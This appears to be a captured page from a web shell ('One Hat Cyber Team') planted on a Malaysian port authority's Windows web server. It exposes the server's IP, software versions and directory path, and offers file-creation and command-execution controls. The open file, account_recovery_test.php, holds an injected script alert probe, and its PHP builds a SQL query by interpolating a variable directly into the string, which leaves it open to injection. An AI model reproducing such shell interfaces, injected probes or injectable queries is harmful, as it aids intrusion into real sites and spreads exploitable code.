One Hat Cyber Team
Your IP :
172.16.0.254
Server IP :
58.26.163.33
Server :
Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Server Software :
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
PHP Version :
7.3.25
Buat File
|
Buat Folder
Eksekusi
Dir :
C:
/
xampp7
/
htdocs
/
edgpens
/
Edit File:
account_recovery_test.php
<?php if(empty($page)){ include("access2.php"); } ?> <script type="text/javascript"> alert(1); </script> <div id="page-content"> <div class="row"> <div class="col-sm-12"> <div class="widget-image widget-image-xs"> <img src="img/lpkmn/bg.jpg" alt="image"> <div class="widget-image-content"> <div class="pull-right text-light-op"> <strong> <form id="form-login" method="post" action="login.php" class="form-inline" style="vertical-align: top"> <div class="row" style="vertical-align: top;margin-bottom: 0px;text-align: right"> <div class="col-md-12"> <i><a style="cursor: pointer;color: #CCC;" href="index.php?page=company_search">Register</a></i> || <i><a style="cursor: pointer;color: #CCC;" href="index.php?page=account_recovery">Forgot Password</a></i> </div> </div> <hr style="margin: 3px"> <div class="form-group" style="vertical-align: top;margin-bottom: 1px"> <div class="col-md-12 nopadding"> <input type="text" id="login-user" name="login-user" class="form-control" placeholder="Your email.."> </div> </div> <div class="form-group" style="vertical-align: top;margin-bottom: 1px"> <div class="col-md-12 nopadding"> <input type="password" id="login-password" name="login-password" class="form-control" placeholder="Your password.."> </div> </div> <div class="form-group form-actions" style="text-align:right;vertical-align: top;margin-bottom: 1px"> <div class="col-md-12 nopadding"> <button type="submit" class="btn btn-effect-ripple btn-sm btn-primary" style="margin-top: 3px"><i class="fa fa-unlock-alt"></i> Login</button> </div> </div> </form> </strong> </div> <h2 class="widget-heading text-light"><strong>eDGPENS LPKMn</strong></h2> <h3 class="widget-heading text-light-op">Lembaga Pelabuhan Kemaman</h3> </div> </div> </div> </div> <?php growl_me($_SESSION,$g_success); use League\OAuth2\Client\Provider\Google; use PHPMailer\PHPMailer\PHPMailer; use PHPMailer\PHPMailer\Exception; use PHPMailer\PHPMailer\SMTP; use PHPMailer\PHPMailer\OAuth; require './vendor/autoload.php'; $email = "amat.cbt@gmail.com"; $mail = new PHPMailer(true); $sql = "SELECT a.* FROM user_list a WHERE 1 AND emailUser = '$email'"; $param_data = array( "emailUser" => $email ); $data = mysqli_prepare_all($sql,$param_type = "auto",$param_data); $usr = $data->fetch_assoc(); $table = "user_list"; $flag = ""; if(empty($usr)){ $flag = "AND flagUser=2"; $sql = "SELECT a.* FROM user_register a WHERE 1 AND emailUser = ? {$flag}"; $param_data = array( "emailUser" => $email ); $data = mysqli_prepare_all($sql,$param_type = "auto",$param_data); $usr = $data->fetch_assoc(); $table = "user_register"; } // if(empty($usr)) // goto skipsend; // try { // ob_start(); $token = md5($email.date("dmyh:i:s")); $stmt = $mysqli->stmt_init(); $stmt->prepare("UPDATE {$table} SET recovery_token = ?, recovery_exp = ADDTIME(NOW(), '00:30:00') WHERE emailUser = ? {$flag}"); $stmt->bind_param("ss",$token,$email); $stmt->execute(); $stmt->close(); $sql = "SELECT `a`.`text`,b.* FROM kod_template a JOIN utiliti_email b WHERE 1 AND a.kod = 'E01'"; $param_data = array(); $datax = mysqli_prepare_all($sql,$param_type = "auto",$param_data); $template_text = $datax->fetch_assoc(); $http = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on'? "https://" : "http://"; $url = $http . $_SERVER["SERVER_NAME"] .'/edgpens/'; $find = array( "%url%", "%token%", "%year%", "%templatename%"); $replace = array( $url, $token, date("Y"), $template['name'].' '.$template['version']); echo str_replace($find,$replace,$template_text['text']); // include('recover_msg.php'); $fileValue =123; // ob_end_clean(); //Server settings // $mail->SMTPDebug = SMTP::DEBUG_SERVER; // Enable verbose debug output $mail->isSMTP(); // Send using SMTP $mail->SMTPOptions = array('ssl' => array('verify_peer_name' => false)); $mail->Host = gethostbyname($template_text['host']); $mail->SMTPAuth = $template_text['smtpauth']; $mail->SMTPSecure = $template_text['smtpsecure']; $mail->Port = $template_text['port']; $mail->AuthType = 'XOAUTH2'; $oauthUserEmail = $template_text['username']; $clientId = $template_text['cid']; $clientSecret = $template_text['csecret']; $refreshToken = $template_text['ctoken']; $provider = new Google( [ 'clientId' => $clientId, 'clientSecret' => $clientSecret, ] ); $mail->setOAuth( new OAuth( [ 'provider' => $provider, 'clientId' => $clientId, 'clientSecret' => $clientSecret, 'refreshToken' => $refreshToken, 'userName' => $oauthUserEmail, ] ) ); //Recipients $mail->setFrom($template_text['setfrom1'],$template_text['setfrom2']); // $mail->addAddress('joe@example.net', 'Joe User'); // Add a recipient $mail->addAddress($email); // Name is optional // $mail->addReplyTo('info@example.com', 'Information'); // $mail->addCC('cc@example.com'); // $mail->addBCC('bcc@example.com'); // Attachments // $mail->addAttachment('/var/tmp/file.tar.gz'); // Add attachments // $mail->addAttachment('/tmp/image.jpg', 'new.jpg'); // Optional name // Content $mail->isHTML(true); // Set email format to HTML $mail->Subject = 'Account Recovery'; $mail->Body = $fileValue; $mail->AltBody = 'This is the body in plain text for non-HTML mail clients'; $mail->send(); echo 'Message has been sent'; // } catch (Exception $e) { // echo "Message could not be sent. Mailer Error: {$mail->ErrorInfo}"; // } // include "recover_msg.php"; // exit(); skipsend: $_SESSION['success'] = 1; $_SESSION['success_msg'] = "Account recovery email has been sent."; // echo "<script>window.location.replace('index.php?page=account_recovery&success=1');</script>"; // exit(); ?> </div>
Simpan